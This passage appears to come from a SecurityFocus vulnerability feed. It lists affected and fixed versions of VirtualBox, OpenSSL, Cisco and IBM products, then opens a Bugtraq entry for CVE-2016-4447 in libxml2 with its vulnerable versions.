Oracle VM VirtualBox 4.1.8
Oracle VM VirtualBox 4.0.36
Oracle VM VirtualBox 4.0.35
Oracle VM VirtualBox 4.0.34
Oracle VM VirtualBox 4.0.30
Oracle VM VirtualBox 4.0.27
Oracle VM VirtualBox 4.0.26
Oracle VM VirtualBox 4.0.24
Oracle VM VirtualBox 4.0.23
Oracle VM VirtualBox 4.0.21
Oracle VM VirtualBox 4.0.20
Oracle VM VirtualBox 4.0.18
Oracle VM VirtualBox 3.2.25
Oracle VM VirtualBox 3.2.24
Oracle VM VirtualBox 3.2.22
Oracle VM VirtualBox 3.2.21
Oracle VM VirtualBox 3.2.19
Oracle VM VirtualBox 3.2.18
Oracle VM VirtualBox 3.2.14
Oracle VM VirtualBox 3.0.1
Oracle VM VirtualBox 1.6.6
Oracle VM VirtualBox 5.0.18
Oracle VM VirtualBox 5.0
Oracle VM VirtualBox 4.3.6
Oracle VM VirtualBox 4.3.4
Oracle VM VirtualBox 4.3.2
Oracle VM VirtualBox 4.3.0
Oracle VM VirtualBox 4.2.8
Oracle VM VirtualBox 4.2.6
Oracle VM VirtualBox 4.2.4
Oracle VM VirtualBox 4.2.22
Oracle VM VirtualBox 4.2.20
Oracle VM VirtualBox 4.2.2
Oracle VM VirtualBox 4.2.16
Oracle VM VirtualBox 4.2.10
Oracle VM VirtualBox 4.2
Oracle VM VirtualBox 4.1.6
Oracle VM VirtualBox 4.1.4
Oracle VM VirtualBox 4.1.30
Oracle VM VirtualBox 4.1.26
Oracle VM VirtualBox 4.1.2
Oracle VM VirtualBox 4.1.0
Oracle VM VirtualBox 4.1
Oracle VM VirtualBox 4.0.8
Oracle VM VirtualBox 4.0.6
Oracle VM VirtualBox 4.0.4
Oracle VM VirtualBox 4.0.22
Oracle VM VirtualBox 4.0.2
Oracle VM VirtualBox 4.0.16
Oracle VM VirtualBox 4.0.14
Oracle VM VirtualBox 4.0.12
Oracle VM VirtualBox 4.0.10
Oracle VM VirtualBox 4.0.0
Oracle VM VirtualBox 4.0
Oracle VM VirtualBox 3.3
Oracle VM VirtualBox 3.2.8
Oracle VM VirtualBox 3.2.6
Oracle VM VirtualBox 3.2.4
Oracle VM VirtualBox 3.2.20
Oracle VM VirtualBox 3.2.2
Oracle VM VirtualBox 3.2.16
Oracle VM VirtualBox 3.2.12
Oracle VM VirtualBox 3.2.10
Oracle VM VirtualBox 3.2.0
Oracle VM VirtualBox 3.2
Oracle VM VirtualBox 3.1.8
Oracle VM VirtualBox 3.1.6
Oracle VM VirtualBox 3.1.4
Oracle VM VirtualBox 3.1.2
Oracle VM VirtualBox 3.1.0
Oracle VM VirtualBox 3.1
Oracle VM VirtualBox 3.0.8
Oracle VM VirtualBox 3.0.6
Oracle VM VirtualBox 3.0.4
Oracle VM VirtualBox 3.0.2
Oracle VM VirtualBox 3.0.14
Oracle VM VirtualBox 3.0.12
Oracle VM VirtualBox 3.0.10
Oracle VM VirtualBox 3.0.0
Oracle VM VirtualBox 2.2.4
Oracle VM VirtualBox 2.2.2
Oracle VM VirtualBox 2.2.0
Oracle VM VirtualBox 2.2
Oracle VM VirtualBox 2.1.4
Oracle VM VirtualBox 2.1.2
Oracle VM VirtualBox 2.1.0
Oracle VM VirtualBox 2.0.8
Oracle VM VirtualBox 2.0.6
Oracle VM VirtualBox 2.0.4
Oracle VM VirtualBox 2.0.2
Oracle VM VirtualBox 2.0.12
Oracle VM VirtualBox 2.0.10
Oracle VM VirtualBox 2.0.0
Oracle VM VirtualBox 1.6.4
Oracle VM VirtualBox 1.6.2
Oracle VM VirtualBox 1.6.0
Oracle VM VirtualBox 1.6
OpenSSL Project OpenSSL 1.1
OpenSSL Project OpenSSL 1.0.11
OpenSSL Project OpenSSL 1.0.2
OpenSSL Project OpenSSL 1.0.2h
OpenSSL Project OpenSSL 1.0.2g
OpenSSL Project OpenSSL 1.0.2f
OpenSSL Project OpenSSL 1.0.2e
OpenSSL Project OpenSSL 1.0.2d
OpenSSL Project OpenSSL 1.0.2c
OpenSSL Project OpenSSL 1.0.2b
OpenSSL Project OpenSSL 1.0.2a
OpenSSL Project OpenSSL 1.0.1t
OpenSSL Project OpenSSL 1.0.1s
OpenSSL Project OpenSSL 1.0.1r
OpenSSL Project OpenSSL 1.0.1q
OpenSSL Project OpenSSL 1.0.1p
OpenSSL Project OpenSSL 1.0.1o
OpenSSL Project OpenSSL 1.0.1n
OpenSSL Project OpenSSL 1.0.1m
OpenSSL Project OpenSSL 1.0.1l
OpenSSL Project OpenSSL 1.0.1k
OpenSSL Project OpenSSL 1.0.1j
OpenSSL Project OpenSSL 1.0.1i
OpenSSL Project OpenSSL 1.0.1h
OpenSSL Project OpenSSL 1.0.1g
OpenSSL Project OpenSSL 1.0.1f
OpenSSL Project OpenSSL 1.0.1e
OpenSSL Project OpenSSL 1.0.1d
OpenSSL Project OpenSSL 1.0.1c
OpenSSL Project OpenSSL 1.0.1b
OpenSSL Project OpenSSL 1.0.1a
OpenSSL Project OpenSSL 1.0.1
IBM Sterling Connect:Express for UNIX 1.5.0.9
IBM Sterling Connect:Express for UNIX 1.5.0.13
IBM Sterling Connect:Express for UNIX 1.5.0.12
IBM Sterling Connect:Express for UNIX 1.5.0.11
IBM Sterling Connect:Express for UNIX 1.5.0
IBM Sterling Connect:Express for UNIX 1.4.6
IBM Sterling Connect:Express for UNIX 1.4
IBM SDK for Node.js 6.6.0.0
IBM SDK for Node.js 6.2.0.0
IBM SDK for Node.js 6.1.0.0
IBM SDK for Node.js 6.0.0.0
IBM SDK for Node.js 4.5.0.0
IBM SDK for Node.js 4.4.6.0
IBM SDK for Node.js 4.4.5.0
IBM SDK for Node.js 4.4.4.0
IBM SDK for Node.js 4.4.3.0
IBM SDK for Node.js 4.4.2.0
IBM SDK for Node.js 4.4.1.0
IBM SDK for Node.js 4.4.0.0
IBM SDK for Node.js 4.3.2.0
IBM SDK for Node.js 4.3.1.0
IBM SDK for Node.js 1.2.0.9
IBM SDK for Node.js 1.2.0.8
IBM SDK for Node.js 1.2.0.4
IBM SDK for Node.js 1.2.0.3
IBM SDK for Node.js 1.2.0.2
IBM SDK for Node.js 1.2.0.14
IBM SDK for Node.js 1.2.0.13
IBM SDK for Node.js 1.2.0.12
IBM SDK for Node.js 1.2.0.11
IBM SDK for Node.js 1.2.0.10
IBM SDK for Node.js 1.2.0.1
IBM SDK for Node.js 1.1.1.3
IBM SDK for Node.js 1.1.1.2
IBM SDK for Node.js 1.1.1.1
IBM SDK for Node.js 1.1.1.0
IBM SDK for Node.js 1.1.0.9
IBM SDK for Node.js 1.1.0.7
IBM SDK for Node.js 1.1.0.6
IBM SDK for Node.js 1.1.0.5
IBM SDK for Node.js 1.1.0.3
IBM SDK for Node.js 1.1.0.21
IBM SDK for Node.js 1.1.0.20
IBM SDK for Node.js 1.1.0.2
IBM SDK for Node.js 1.1.0.19
IBM SDK for Node.js 1.1.0.18
IBM SDK for Node.js 1.1.0.15
IBM SDK for Node.js 1.1.0.14
IBM SDK for Node.js 1.1.0.13
IBM SDK for Node.js 1.1.0.12
IBM SDK for Node.js 1.1
IBM Rational Application Developer for WebSphere Software 9.5
IBM Rational Application Developer for WebSphere Software 9.1
IBM i 7.3
IBM i 7.2
IBM i 7.1
IBM BigFix Remote Control 9.1.2
Cisco Wide Area Application Services (WAAS) 0
Cisco WebEx Node for MCS 0
Cisco WebEx Meetings Server - Multimedia Platform (MMP) 0
Cisco WebEx Meetings Server 2.0
Cisco WebEx Meetings Server 1.0
Cisco WebEx Meetings for Windows Phone 8 0
Cisco WebEx Meetings for BlackBerry 0
Cisco WebEx Meetings for Android 0
Cisco WebEx Meetings Client - On-Premises 0
Cisco WebEx Meetings Client - Hosted 0
Cisco WebEx Meeting Center 0
Cisco WebEx Business Suite 0
Cisco Web Security Appliance (WSA) 0
Cisco Visual Quality Experience Tools Server 0
Cisco Visual Quality Experience Server 0
Cisco Virtualization Experience Media Edition 0
Cisco Virtual Security Gateway 0
Cisco Videoscape Control Suite 0
Cisco Videoscape AnyRes Live 0
Cisco Video Surveillance PTZ IP Cameras 0
Cisco Video Surveillance Media Server 0
Cisco Video Surveillance 7000 Series IP Cameras 0
Cisco Video Surveillance 6000 Series IP Cameras 0
Cisco Video Surveillance 4300E and 4500E High-Definition IP Cameras 0
Cisco Video Surveillance 4000 Series High-Definition IP Cameras 0
Cisco Video Surveillance 3000 Series IP Cameras 0
Cisco Video Distribution Suite for Internet Streaming (VDS-IS/CDS-IS) 0
Cisco Universal Small Cell Iuh 0
Cisco Universal Small Cell CloudBase Factory Recovery Root Filesystem 2.99.4
Cisco Universal Small Cell CloudBase Factory Recovery Root Filesystem 0
Cisco Universal Small Cell 7000 Series 3.4.2.0
Cisco Universal Small Cell 5000 Series 3.4.2.0
Cisco Universal Small Cell 5000 Series 0
Cisco Unity Express 0
Cisco Unity Connection 0
Cisco Unified Workforce Optimization - Quality Management Solution 0
Cisco Unified Workforce Optimization 0
Cisco Unified SIP Proxy Software 0
Cisco Unified MeetingPlace 0
Cisco Unified IP 9971 Phone 0
Cisco Unified IP 9951 Phone 0
Cisco Unified IP 8961 Phone 0
Cisco Unified IP 8945 Phone 0
Cisco Unified IP 8831 Conference Phone for Third-Party Call Control 0
Cisco Unified IP 8831 Conference Phone 0
Cisco Unified IP 7900 Series Phones 0
Cisco Unified IP 6945 Phone 0
Cisco Unified IP 6901 Phone 0
Cisco Unified Intelligent Contact Management Enterprise 0
Cisco Unified Intelligence Center 0
Cisco Unified Contact Center Express 0
Cisco Unified Contact Center Enterprise 0
Cisco Unified Communications Manager Session Management Edition 0
Cisco Unified Communications Manager IM & Presence Service (formerly C 0
Cisco Unified Communications Manager (CUCM) 0
Cisco Unified Communications Domain Manager 0
Cisco Unified Attendant Console Premium Edition 0
Cisco Unified Attendant Console Enterprise Edition 0
Cisco Unified Attendant Console Department Edition 0
Cisco Unified Attendant Console Business Edition 0
Cisco Unified Attendant Console Advanced 0
Cisco UCS Standalone C-Series Rack Server - Integrated Management Cont 0
Cisco UCS Manager 0
Cisco UCS Director 0
Cisco UCS Central Software 0
Cisco UCS B-Series Blade Servers 0
Cisco UCS 6200 Series and 6300 Series Fabric Interconnects 0
Cisco UC Integration for Microsoft Lync 0
Cisco TelePresence Video Communication Server (VCS) 0
Cisco TelePresence TX9000 Series 0
Cisco TelePresence System TX1310 0
Cisco TelePresence System EX Series 0
Cisco TelePresence System 500-37 0
Cisco TelePresence System 500-32 0
Cisco TelePresence System 3000 Series 0
Cisco TelePresence System 1300 0
Cisco TelePresence System 1100 0
Cisco TelePresence System 1000 0
Cisco TelePresence SX Series 0
Cisco TelePresence Supervisor MSE 8050 0
Cisco TelePresence Server on Virtual Machine 0
Cisco TelePresence Server on Multiparty Media 820 0
Cisco TelePresence Server on Multiparty Media 310 and 320 0
Cisco TelePresence Server 7010 and MSE 8710 0
Cisco TelePresence Serial Gateway Series 0
Cisco TelePresence Profile Series 0
Cisco TelePresence MX Series 0
Cisco TelePresence MCU 0
Cisco TelePresence ISDN Link 0
Cisco TelePresence ISDN Gateway MSE 8321 0
Cisco TelePresence ISDN Gateway 3241 0
Cisco TelePresence Integrator C Series 0
Cisco TelePresence Content Server 0
Cisco TelePresence Conductor 0
Cisco TAPI Service Provider (TSP) 0
Cisco Tandberg Codian MSE 8320 0
Cisco Tandberg Codian ISDN Gateway 0
Cisco StealthWatch UDP Director 0
Cisco StealthWatch Management Console (SMC) 0
Cisco StealthWatch IDentity 0
Cisco StealthWatch FlowCollector sFlow 0
Cisco StealthWatch FlowCollector NetFlow 0
Cisco SPA525G 5-Line IP Phone 0
Cisco SPA232D Multi-Line DECT Analog Telephone Adapter (ATA) 0
Cisco SPA122 Analog Telephone Adapter (ATA) with Router 0
Cisco SPA112 2-Port Phone Adapter 0
Cisco SocialMiner 0
Cisco Smart Net Total Care - Local Collector appliance 0
Cisco Smart Care 0
Cisco Small Business 300 Series (Sx300) Managed Switches 0
Cisco Show and Share 0
Cisco Services Provisioning Platform 0
Cisco Security Manager 0
Cisco Secure Access Control System (ACS) 0
Cisco Registered Envelope Service 0
Cisco Proactive Network Operations Center 0
Cisco Prime Performance Manager 0
Cisco Prime Optical for Service Providers 0
Cisco Prime Network Services Controller 0
Cisco Prime Network 0
Cisco Prime License Manager 0
Cisco Prime IP Express 0
Cisco Prime Infrastructure Plug and Play Standalone Gateway 0
Cisco Prime Data Center Network Manager -
Cisco Prime Collaboration Provisioning 0
Cisco Prime Collaboration Deployment 0
Cisco Prime Collaboration Assurance 0
Cisco Prime Access Registrar 0
Cisco Partner Support Service 1.0
Cisco Paging Server (Informacast) 0
Cisco Paging Server 0
Cisco Packaged Contact Center Enterprise 0
Cisco ONS 15454 Series Multiservice Provisioning Platforms 0
Cisco onePK All-in-One Virtual Machine 0
Cisco Nexus 9000 Series Switches - Standalone NX-OS mode 0
Cisco Nexus 9000 Series Fabric Switches - ACI mode 0
Cisco Nexus 7000 Series Switches 0
Cisco Nexus 6000 Series Switches 0
Cisco Nexus 5000 Series Switches 0
Cisco Nexus 4000 Series Blade Switches 0
Cisco Nexus 1000V Series Switches 0
Cisco Network Performance Analysis 0
Cisco Network Analysis Module 0
Cisco NetFlow Generation Appliance 0
Cisco NAC Guest Server 0
Cisco NAC Appliance - Clean Access Server 0
Cisco NAC Appliance - Clean Access Manager 0
Cisco MXE 3500 Series Media Experience Engines 0
Cisco Multicast Manager 0
Cisco MediaSense 0
Cisco Media Services Interface 0
Cisco MDS 9000 Series Multilayer Switches 0
Cisco Management Appliance 0
Cisco Jabber Software Development Kit 0
Cisco Jabber Guest 0
Cisco Jabber for Windows 0
Cisco Jabber for Mac 0
Cisco Jabber for iPhone and iPad 0
Cisco Jabber for Android 0
Cisco Jabber Client Framework (JCF) Components 0
Cisco IP Interoperability and Collaboration System (IPICS) 0
Cisco IP 8800 Series Phones - VPN feature 0
Cisco IP 7800 Series Phones 0
Cisco Intrusion Prevention System (IPS) Solutions 0
Cisco InTracer 0
Cisco Hosted Collaboration Mediation Fulfillment 0
Cisco FireSIGHT System Software 0
Cisco Expressway series 0
Cisco Enterprise Content Delivery System (ECDS) 0
Cisco Emergency Responder 0
Cisco Email Security Appliance (ESA) 0
Cisco Edge 340 Digital Media Player 0
Cisco Edge 300 Digital Media Player 0
Cisco DX Series IP Phones 0
Cisco Content Security Management Appliance (SMA) 0
Cisco Content Security Appliance Update Servers 0
Cisco Connected Grid Routers 0
Cisco Computer Telephony Integration Object Server (CTIOS) 0
Cisco Common Services Platform Collector 0
Cisco Cloupia Unified Infrastructure Controller 0
Cisco Cloud Web Security 0
Cisco Cloud Object Storage 0
Cisco Clean Access Manager 0
Cisco ATA 190 Series Analog Terminal Adaptors 0
Cisco ATA 187 Analog Telephone Adaptor 0
Cisco ASR 5000 Series 0
Cisco ASA Next-Generation Firewall Services 0
Cisco Application Policy Infrastructure Controller (APIC) 0
Cisco Application and Content Networking System (ACNS) 0
Cisco AnyConnect Secure Mobility Client for Windows 0
Cisco AnyConnect Secure Mobility Client for Mac OS X 0
Cisco AnyConnect Secure Mobility Client for Linux 0
Cisco AnyConnect Secure Mobility Client for iOS 0
Cisco AnyConnect Secure Mobility Client for desktop platforms 0
Cisco AnyConnect Secure Mobility Client for Android 0
Cisco Aironet 2700 Series Access Points 0
Cisco Agent for OpenFlow 0
Cisco Agent Desktop for Cisco Unified Contact Center Express 0
Cisco Adaptive Security Appliance (ASA) 0
Cisco ACE30 Application Control Engine Module 0
Cisco ACE 4710 Application Control Engine 0
Cisco 910 Industrial Router 0
Cisco 500 Series Stackable (Sx500) Managed Switches 0
Cisco 4400 Series Digital Media Players 0
Cisco 4300 Series Digital Media Players 0
Cisco 220 Series Smart Plus (Sx220) Switches 0
CentOS CentOS 7 Not Vulnerable: Pexip Pexip Infinity 13
Oracle VM VirtualBox 5.1.8
Oracle VM VirtualBox 5.0.28
OpenSSL Project OpenSSL 1.1.0a
OpenSSL Project OpenSSL 1.0.2i
OpenSSL Project OpenSSL 1.0.1u
IBM Sterling Connect:Express for UNIX 1.5.0.13 iFix 150-13
IBM SDK for Node.js 6.7.0.0
IBM SDK for Node.js 4.6.0.0
IBM SDK for Node.js 1.2.0.15
IBM SDK for Node.js 1.1.1.4
IBM BigFix Remote Control 9.1.3
Cisco Wireless Lan Controller 8.4
Cisco WebEx Meetings Server 2.6.1.30
Cisco WebEx Meetings for Windows Phone 8 2.8
Cisco WebEx Meetings Client - On-Premises T32
Cisco WebEx Meetings Client - Hosted T32
Cisco WebEx Centers T32
Cisco Virtualization Experience Media Edition 11.8
Cisco Virtual Security Gateway 2.1.6
Cisco Videoscape AnyRes Live 9.7.2
Cisco Video Surveillance PTZ IP Cameras 2.9
Cisco Video Surveillance 7000 Series IP Cameras 2.9
Cisco Video Surveillance 6000 Series IP Cameras 2.9
Cisco Video Surveillance 4300E and 4500E High-Definition IP Cameras 2.9
Cisco Video Surveillance 4000 Series High-Definition IP Cameras 2.9
Cisco Video Surveillance 3000 Series IP Cameras 2.9
Cisco Video Distribution Suite for Internet Streaming (VDS-IS/CDS-IS) 4.003(002)
Cisco Universal Small Cell Iuh 3.17.3
Cisco Universal Small Cell CloudBase Factory Recovery Root Filesystem 3.17.3
Cisco Universal Small Cell 7000 Series 3.5.12.23
Cisco Universal Small Cell 5000 Series 3.5.12.23
Cisco Unity Express 10
Cisco Unified Workforce Optimization - Quality Management Solution 11.5(1)SU1
Cisco Unified SIP Proxy Software 10
Cisco Unified MeetingPlace 8.6MR1
Cisco Unified IP 8831 Conference Phone for Third-Party Call Control 9.3(4)SR3
Cisco Unified IP 8831 Conference Phone 10.3.1SR4
Cisco Unified IP 6901 Phone 9.3(1)SR3
Cisco Unified Intelligent Contact Management Enterprise 11.6.1
Cisco Unified Intelligence Center 11.6(1)
Cisco Unified Contact Center Express 11.6
Cisco Unified Contact Center Enterprise 11.6.1
Cisco UCS Standalone C-Series Rack Server - Integrated Management Cont 3.0
Cisco UCS B-Series Blade Servers 3.1.3
Cisco UC Integration for Microsoft Lync 11.6.3
Cisco TelePresence Video Communication Server (VCS) X8.8.3
Cisco TelePresence TX9000 Series 6.1
Cisco TelePresence System TX1310 6.1
Cisco TelePresence System EX Series TC7.3.7
Cisco TelePresence System EX Series CE8.2.2
Cisco Telepresence System 500-37 6.1
Cisco Telepresence System 500-32 6.1
Cisco TelePresence System 3000 Series 6.1
Cisco Telepresence System 1300 6.1
Cisco Telepresence System 1100 6.1
Cisco Telepresence System 1000 6.1
Cisco TelePresence SX Series TC7.3.7
Cisco TelePresence SX Series CE8.2.2
Cisco TelePresence Server on Multiparty Media 820 4.4
Cisco TelePresence Server on Multiparty Media 310 and 320 4.4
Cisco TelePresence Server 7010 and MSE 8710 4.4
Cisco TelePresence Profile Series TC7.3.7
Cisco TelePresence Profile Series CE8.2.2
Cisco TelePresence MX Series TC7.3.7
Cisco TelePresence MX Series CE8.2.2
Cisco TelePresence MCU 4.5(1.89)
Cisco TelePresence Integrator C Series TC7.3.7
Cisco TelePresence Integrator C Series CE8.2.2
Cisco SPA232D Multi-Line DECT Analog Telephone Adapter (ATA) 1.4.2
Cisco SPA122 Analog Telephone Adapter (ATA) with Router 1.4.2
Cisco SPA112 2-Port Phone Adapter 1.4.2
Cisco Services Provisioning Platform SFP1.1
Cisco Security Manager 4.13
Cisco Secure Access Control System (ACS) 5.8.0.32.8
Cisco Secure Access Control System (ACS) 5.8.0.32.7
Cisco Prime Performance Manager 1.7 SP1611
Cisco Prime Network Services Controller 1.01u
Cisco Prime Network Registrar 8.3.5
Cisco Prime Network Registrar 9.0
Cisco Prime Network 431
Cisco Prime Infrastructure 3.2
Cisco Prime Collaboration Provisioning 11.6
Cisco Prime Collaboration Assurance 11.6
Cisco ONS 15454 Series Multiservice Provisioning Platforms 10.7
Cisco Nexus 9000 Series Switches - Standalone NX-OS mode 7.0(3)I5(1)
Cisco Nexus 9000 Series Fabric Switches - ACI mode 0
Cisco Nexus 7000 Series Switches 6.2.19
Cisco Nexus 7000 Series Switches 5.2.8(i)
Cisco Nexus 6000 Series Switches 6.2.19
Cisco Nexus 6000 Series Switches 5.2.8(i)
Cisco Nexus 5000 Series Switches 6.2.19
Cisco Nexus 5000 Series Switches 5.2.8(i)
Cisco Nexus 4000 Series Blade Switches 4.1(2)E1(1r)
Cisco Nexus 1000V Series Switches 5.2(1)SV3(2.5)
Cisco Network Analysis Module 6.2(2)
Cisco Network Analysis Module 6.2(1-b)
Cisco NetFlow Generation Appliance 1.1(1)
Cisco MDS 9000 Series Multilayer Switches 6.2.19
Cisco MDS 9000 Series Multilayer Switches 5.2.8(i)
Cisco Jabber Software Development Kit 11.8
Cisco Jabber Guest 11
Cisco Jabber for Windows 11.8
Cisco Jabber for Mac 11.8
Cisco Jabber for iPhone and iPad 11.8
Cisco Jabber for Android 11.8
Cisco Jabber Client Framework (JCF) Components 11.8
Cisco IP Interoperability and Collaboration System (IPICS) 5.0(1)
Cisco IOS and Cisco IOS XE Software 16.4
Cisco IOS and Cisco IOS XE Software 16.3
Cisco IOS and Cisco IOS XE Software 16.2
Cisco IOS and Cisco IOS XE Software 16.1
Cisco IOS and Cisco IOS XE Software 15.5(3)
Cisco FireSIGHT System Software 6.1.0.1
Cisco FireSIGHT System Software 6.0.1.3
Cisco FireSIGHT System Software 5.4.1.9
Cisco FireSIGHT System Software 5.4.0.10
Cisco Expressway series X8.8.3
Cisco Enterprise Content Delivery System (ECDS) 2.6.9
Cisco Email Security Appliance (ESA) 10.0.1
Cisco Edge 340 Digital Media Player 1.2RB1.0.3
Cisco Edge 300 Digital Media Player 1.6RB5
Cisco Digital Media Manager 5.4.1_RB4
Cisco Digital Media Manager 5.3.6_RB3
Cisco DCM Series D9900 Digital Content Manager 0
Cisco Content Security Management Appliance (SMA) 6.1.140
Cisco Connected Grid Routers 15.8.9
Cisco Connected Grid Routers 7.3
Cisco Computer Telephony Integration Object Server (CTIOS) 11.6.1
Cisco Common Services Platform Collector 1.11
Cisco ATA 190 Series Analog Terminal Adaptors 1.3
Cisco ASR 5000 Series 21.2
Cisco ASA Next-Generation Firewall Services 2.1.2
Cisco Application Policy Infrastructure Controller (APIC) 2.2(1)
Cisco AnyConnect Secure Mobility Client for Windows 4.0.7
Cisco AnyConnect Secure Mobility Client for Mac OS X 4.0.7
Cisco AnyConnect Secure Mobility Client for Linux 4.0.7
Cisco AnyConnect Secure Mobility Client for iOS 4.0.7
Cisco AnyConnect Secure Mobility Client for desktop platforms 4.3.4
Cisco AnyConnect Secure Mobility Client for desktop platforms 4.4
Cisco AnyConnect Secure Mobility Client for Android 4.0.7
Cisco Aironet 2700 Series Access Points 16.4
Cisco Aironet 2700 Series Access Points 16.3
Cisco Aironet 2700 Series Access Points 16.2
Cisco Aironet 2700 Series Access Points 16.1
Cisco Aironet 2700 Series Access Points 15.5(3)
Cisco 910 Industrial Router 1.2.1RB4
Cisco 4400 Series Digital Media Players 5.4.1_RB4
Cisco 4400 Series Digital Media Players 5.3.6_RB3
Cisco 4300 Series Digital Media Players 5.4.1_RB4
Cisco 4300 Series Digital Media Players 5.3.6_RB3


SecurityFocus Vulnerabilities

Bugtraq ID: 90864 Class: Failure to Handle Exceptional Conditions CVE: CVE-2016-4447 Remote: Yes Local: No Published: May 23 2016 12:00AM Updated: Sep 30 2016 12:02AM Credit: David Kilzer Vulnerable: XMLSoft Libxml2 2.9
XMLSoft Libxml2 2.7.8
XMLSoft Libxml2 2.7.7
XMLSoft Libxml2 2.7.6
XMLSoft Libxml2 2.7.5
XMLSoft Libxml2 2.7.4
XMLSoft Libxml2 2.7.3
XMLSoft Libxml2 2.7.2
XMLSoft Libxml2 2.7.1
XMLSoft Libxml2 2.7
XMLSoft Libxml2 2.6.32
XMLSoft Libxml2 2.6.31
XMLSoft Libxml2 2.6.30
XMLSoft Libxml2 2.6.26
XMLSoft Libxml2 2.6.24
XMLSoft Libxml2 2.6.23
XMLSoft Libxml2 2.6.22
XMLSoft Libxml2 2.6.21
XMLSoft Libxml2 2.6.20
XMLSoft Libxml2 2.6.18
XMLSoft Libxml2 2.6.17
XMLSoft Libxml2 2.6.16
XMLSoft Libxml2 2.6.15
XMLSoft Libxml2 2.6.14
XMLSoft Libxml2 2.6.13
XMLSoft Libxml2 2.6.12
XMLSoft Libxml2 2.6.11
XMLSoft Libxml2 2.6.9
XMLSoft Libxml2 2.6.8
XMLSoft Libxml2 2.6.7
XMLSoft Libxml2 2.6.6
XMLSoft Libxml2 2.6.5
XMLSoft Libxml2 2.6.4
XMLSoft Libxml2 2.6.3
XMLSoft Libxml2 2.6.2
XMLSoft Libxml2 2.6.1
XMLSoft Libxml2 2.5.11
XMLSoft Libxml2 2.5.10
XMLSoft Libxml2 2.5.8
XMLSoft Libxml2 2.5.4
XMLSoft Libxml2 2.5.1
XMLSoft Libxml2 2.4.30
XMLSoft Libxml2 2.4.29
XMLSoft Libxml2 2.4.28
XMLSoft Libxml2 2.4.27
XMLSoft Libxml2 2.4.26
XMLSoft Libxml2 2.4.24
XMLSoft Libxml2 2.4.23
XMLSoft Libxml2 2.4.22
XMLSoft Libxml2 2.4.21
XMLSoft Libxml2 2.4.20
XMLSoft Libxml2 2.4.19
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
XMLSoft Libxml2 2.4.18
XMLSoft Libxml2 2.4.17
XMLSoft Libxml2 2.4.16
XMLSoft Libxml2 2.4.15
XMLSoft Libxml2 2.4.14
XMLSoft Libxml2 2.4.13
XMLSoft Libxml2 2.4.12
XMLSoft Libxml2 2.4.11
XMLSoft Libxml2 2.4.10
XMLSoft Libxml2 2.4.9
XMLSoft Libxml2 2.4.8
XMLSoft Libxml2 2.4.7
XMLSoft Libxml2 2.4.6
XMLSoft Libxml2 2.4.5
XMLSoft Libxml2 2.4.4
XMLSoft Libxml2 2.4.3
XMLSoft Libxml2 2.4.2
XMLSoft Libxml2 2.3.14
XMLSoft Libxml2 2.3.13
XMLSoft Libxml2 2.3.12
XMLSoft Libxml2 2.3.10
XMLSoft Libxml2 2.3.8
XMLSoft Libxml2 2.3.7
XMLSoft Libxml2 2.3.6
XMLSoft Libxml2 2.3.5
XMLSoft Libxml2 2.3.4
XMLSoft Libxml2 2.2.11
XMLSoft Libxml2 2.2.10
XMLSoft Libxml2 2.2.7
XMLSoft Libxml2 2.2.6
XMLSoft Libxml2 2.2.5
XMLSoft Libxml2 2.2.4
XMLSoft Libxml2 2.2.3
XMLSoft Libxml2 1.8.14
XMLSoft Libxml2 1.8.10
XMLSoft Libxml2 1.8.9
XMLSoft Libxml2 1.8.5
XMLSoft Libxml2 1.8.4
XMLSoft Libxml2 1.8.3
XMLSoft Libxml2 1.8.1
XMLSoft Libxml2 1.8.1
XMLSoft Libxml2 1.7.4
XMLSoft Libxml2 1.7
XMLSoft Libxml2 2.9.3
XMLSoft Libxml2 2.9.2
XMLSoft Libxml2 2.9.1
XMLSoft Libxml2 2.6.29
XMLSoft Libxml2 2.6.28
XMLSoft Libxml2 2.6.27
XMLSoft Libxml2 2.6.25
XMLSoft Libxml2 2.6.0
XMLSoft Libxml2 2.5.7
XMLSoft Libxml2 2.5.0
XMLSoft Libxml2 2.4.25
XMLSoft Libxml2 2.4.1
XMLSoft Libxml2 2.3.3
XMLSoft Libxml2 2.3.2
XMLSoft Libxml2 2.3.11
XMLSoft Libxml2 2.3.1
XMLSoft Libxml2 2.3.0
XMLSoft Libxml2 2.2.9
XMLSoft Libxml2 2.2.8
XMLSoft Libxml2 2.2.2
XMLSoft Libxml2 2.2.1
XMLSoft Libxml2 2.2.0
XMLSoft Libxml2 2.1.1
XMLSoft Libxml2 2.1.0
XMLSoft Libxml2 2.0.0
XMLSoft Libxml2 1.8.7
XMLSoft Libxml2 1.8.6
XMLSoft Libxml2 1.8.16
XMLSoft Libxml2 1.8.13
XMLSoft Libxml2 1.7.3
XMLSoft Libxml2 1.7.2
XMLSoft Libxml2 1.7.1
Slackware Linux 14.1 x86_64
Slackware Linux 14.1
Slackware Linux 14.0 x86_64
Slackware Linux 14.0
Oracle VM Server for x86 3.4
Oracle VM Server for x86 3.3
Oracle Linux 7
Oracle Linux 6
IBM SmartCloud Entry 3.2 Fix Pack 19
IBM SmartCloud Entry 3.2 Fix Pack 18
IBM SmartCloud Entry 3.2 fix pack 14
IBM SmartCloud Entry 3.2 fix pack 13
IBM SmartCloud Entry 3.2 Fix Pack 11
IBM SmartCloud Entry 3.2 Appliance fix pack 2
IBM SmartCloud Entry 3.2 Appliance fix pack 1
IBM SmartCloud Entry 3.2
IBM SmartCloud Entry 3.1 FP 9
IBM SmartCloud Entry 3.1 fix pack 13
IBM SmartCloud Entry 3.1 Fix Pack 10
IBM SmartCloud Entry 3.1 Appliance fix pack 2
IBM SmartCloud Entry 3.1 Appliance fix pack 1
IBM SmartCloud Entry 3.1
IBM SmartCloud Entry 2.4 Fix Pack 2
IBM SmartCloud Entry 2.4 Appliance fix pack 6
IBM SmartCloud Entry 2.4 Appliance fix pack 4
IBM SmartCloud Entry 2.3 Fix Pack 2
IBM SmartCloud Entry 2.3 Fix Pack 1
IBM SmartCloud Entry 2.3 Appliance fix pack 6
IBM SmartCloud Entry 2.3 Appliance fix pack 4
IBM SmartCloud Entry 2.2 Fix Pack 2
IBM SmartCloud Entry 2.2 Fix Pack 1
IBM SmartCloud Entry 2.2 Appliance fix pack 6
